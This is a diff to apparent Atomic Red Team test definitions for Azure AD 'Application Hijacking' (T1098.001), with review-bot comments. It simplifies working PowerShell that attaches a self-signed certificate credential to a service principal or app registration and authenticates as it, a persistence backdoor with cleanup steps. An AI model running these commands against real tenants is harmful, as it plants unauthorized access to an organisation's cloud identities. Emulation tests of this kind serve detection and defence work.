diff --git a/atomics/Indexes/azure-ad-index.yaml b/atomics/Indexes/azure-ad-index.yaml index 43a59236..e3f59826 100644 --- a/atomics/Indexes/azure-ad-index.yaml +++ b/atomics/Indexes/azure-ad-index.yaml @@ -37535,14 +37535,6 @@ persistence: description: Name of the targeted service principal type: string default: SuperSP - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: "$env:TEMP" dependency_executor_name: powershell dependencies: - description: 'AzureAD module must be installed. 
@@ -37566,21 +37558,18 @@ persistence: if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId 
-ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -37593,8 +37582,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false - name: Azure AD Application Hijacking - App Registration @@ -37618,14 +37606,6 @@ persistence: description: Name of the targeted application type: string default: SuperApp - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: "$env:TEMP" dependency_executor_name: powershell dependencies: - description: 'AzureAD module must be installed. 
@@ -37649,21 +37629,18 @@ persistence: if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId 
$app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -37676,8 +37653,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false T1053.004: diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index d7b4d4e8..b8224d2f 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -62806,14 +62806,6 @@ persistence: description: Name of the targeted service principal type: string default: SuperSP - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: "$env:TEMP" dependency_executor_name: powershell dependencies: - description: 'AzureAD module must be installed. 
@@ -62837,21 +62829,18 @@ persistence: if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId 
-ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -62864,8 +62853,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false - name: Azure AD Application Hijacking - App Registration @@ -62889,14 +62877,6 @@ persistence: description: Name of the targeted application type: string default: SuperApp - certificate_password: - description: Password of the new certificate - type: string - default: Passw0rd - path_to_cert: - description: Path of the new certificate, locally stored - type: string - default: "$env:TEMP" dependency_executor_name: powershell dependencies: - description: 'AzureAD module must be installed. 
@@ -62920,21 +62900,18 @@ persistence: if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long - $certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) - $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint - Write-Host "Generated certificate ""$thumb""" - $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText - Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null + $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) + $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) + Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail - $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb + $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId 
$app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord @@ -62947,8 +62924,7 @@ persistence: -eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My - | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\" - -ErrorAction Ignore\n" + | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n" name: powershell elevation_required: false - name: AWS - Create Access Key and Secret Key diff --git a/atomics/T1098.001/T1098.001.md b/atomics/T1098.001/T1098.001.md index b1150539..1eb42e11 100644 --- a/atomics/T1098.001/T1098.001.md +++ b/atomics/T1098.001/T1098.001.md @@ -42,8 +42,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini | username | Azure AD username | string | jonh@contoso.com| | password | Azure AD password | string | p4sswd| | service_principal_name | Name of the targeted service principal | string | SuperSP| -| certificate_password | Password of the new certificate | string | Passw0rd| -| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP| #### Attack Commands: Run with `powershell`! 
@@ -59,21 +57,18 @@ $sp = Get-AzureADServicePrincipal -SearchString "#{service_principal_name}" | Se if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long -$certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) -$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint -Write-Host "Generated certificate ""$thumb""" -$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText -Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null +$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry -$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd) +$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) +Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail -$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb 
+$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" ``` @@ -94,7 +89,6 @@ foreach ($cred in $credz) { } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item -rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore ``` @@ -136,8 +130,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini | username | Azure AD username | string | jonh@contoso.com| | password | Azure AD password | string | p4sswd| | application_name | Name of the targeted application | string | SuperApp| -| certificate_password | Password of the new certificate | string | Passw0rd| -| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP| #### Attack Commands: Run with `powershell`! 
@@ -153,21 +145,18 @@ $app = Get-AzureADApplication -SearchString "#{application_name}" | Select-Objec if ($app -eq $null) { Write-Warning "Application not found"; exit } # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long -$certNotAfter = (Get-Date).AddDays(2) $credNotAfter = (Get-Date).AddDays(1) -$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint -Write-Host "Generated certificate ""$thumb""" -$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText -Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null +$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry -$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd) +$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData()) +Write-Host "Generated certificate ""$($cert.Thumbprint)""" New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter Start-Sleep -s 30 $tenant = Get-AzureADTenantDetail -$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb +$auth = 
Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)" Write-Host "End of Hijacking" ``` @@ -188,7 +177,6 @@ foreach ($cred in $credz) { } } Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item -rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore ```
diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml
index b203d66d..ff5c5d8d 100644
--- a/atomics/T1098.001/T1098.001.yaml
+++ b/atomics/T1098.001/T1098.001.yaml
@@ -22,14 +22,6 @@ atomic_tests:
description: Name of the targeted service principal
type: string
default: SuperSP
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: $env:TEMP
dependency_executor_name: powershell
dependencies:
- description: |
@@ -49,21 +41,18 @@ atomic_tests:
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
- $certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
- $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
- Write-Host "Generated certificate ""$thumb"""
- $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
- Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
+ $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+ $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+ Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
- $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId
-ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
@@ -82,7 +71,6 @@ atomic_tests:
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
- rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore
name: powershell
elevation_required: false
@@ -107,14 +95,6 @@ atomic_tests:
description: Name of the targeted application
type: string
default: SuperApp
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: $env:TEMP
dependency_executor_name: powershell
dependencies:
- description: |
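Review bot: The new `+ $cert = New-SelfSignedCertificate …` line still passes `-KeyExportPolicy Exportable`, although the only consumer of an exportable key, the `Export-PfxCertificate` call, is removed by this same hunk. Connect-AzureAD authenticates with the key as it sits in `Cert:\CurrentUser\My`, so the test appears to no longer need export, and an exportable key means the planted credential's private key can be pulled out as a PFX by anything running as the tester until cleanup runs. Suggest `-KeyExportPolicy NonExportable` (verify once that Connect-AzureAD still signs with a non-exportable key from the "Microsoft Enhanced RSA and AES Cryptographic Provider"), or a short comment stating why export is still wanted. Note the hunk's closing `+ $auth = Connect-AzureAD …` line is wrapped across two lines of this listing, with `-ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint` continuing at the start of the next.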
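Review bot: Now that no PFX copy exists, the entry under `Cert:\CurrentUser\My` holds the only private key for the planted credential, yet `… | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item` deletes the certificate without its key container, leaving an orphaned RSA key in the user's key store. The Certificate provider's Remove-Item exposes a `-DeleteKey` switch for this; suggest `Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item -DeleteKey`. Dropping the `rm "#{path_to_cert}\…pfx"` line is consistent with removing the export step.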
@@ -134,21 +114,18 @@ atomic_tests:
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
- $certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
- $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
- Write-Host "Generated certificate ""$thumb"""
- $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
- Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
+ $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+ $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+ Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
- $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId
$app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: |
@@ -166,7 +143,6 @@ atomic_tests:
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
- rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore
name: powershell
elevation_required: false
- name: AWS - Create Access Key and Secret Key
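Review bot: `-KeyExportPolicy Exportable` on the new `$cert = New-SelfSignedCertificate …` line is a leftover from the PFX round-trip this hunk deletes; nothing in the remaining flow exports the key, since `$cert.GetRawCertData()` uploads only the public certificate and Connect-AzureAD uses the store copy by thumbprint. Keeping the key exportable widens what an attacker with the tester's session could take with it, so `-KeyExportPolicy NonExportable` would be the least-privilege default, subject to confirming Connect-AzureAD still signs with such a key. This test's cert-generation lines are byte-identical to the service-principal test above it, so whichever policy is chosen should be applied to both. The final `+ $auth = Connect-AzureAD …` line is split across two lines of this listing; it continues with `$app.AppId -CertificateThumbprint $cert.Thumbprint`.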
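Review bot: The cleanup's `Remove-Item` on the `AtomicCert` store entry leaves the private key container behind, and with the PFX export gone that container is the sole copy of the backdoor key. Suggest `Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item -DeleteKey`, using the Certificate provider's switch for deleting the associated private key along with the certificate. Removing the `rm "#{path_to_cert}\#{application_name}.pfx"` line is correct since the file is no longer written.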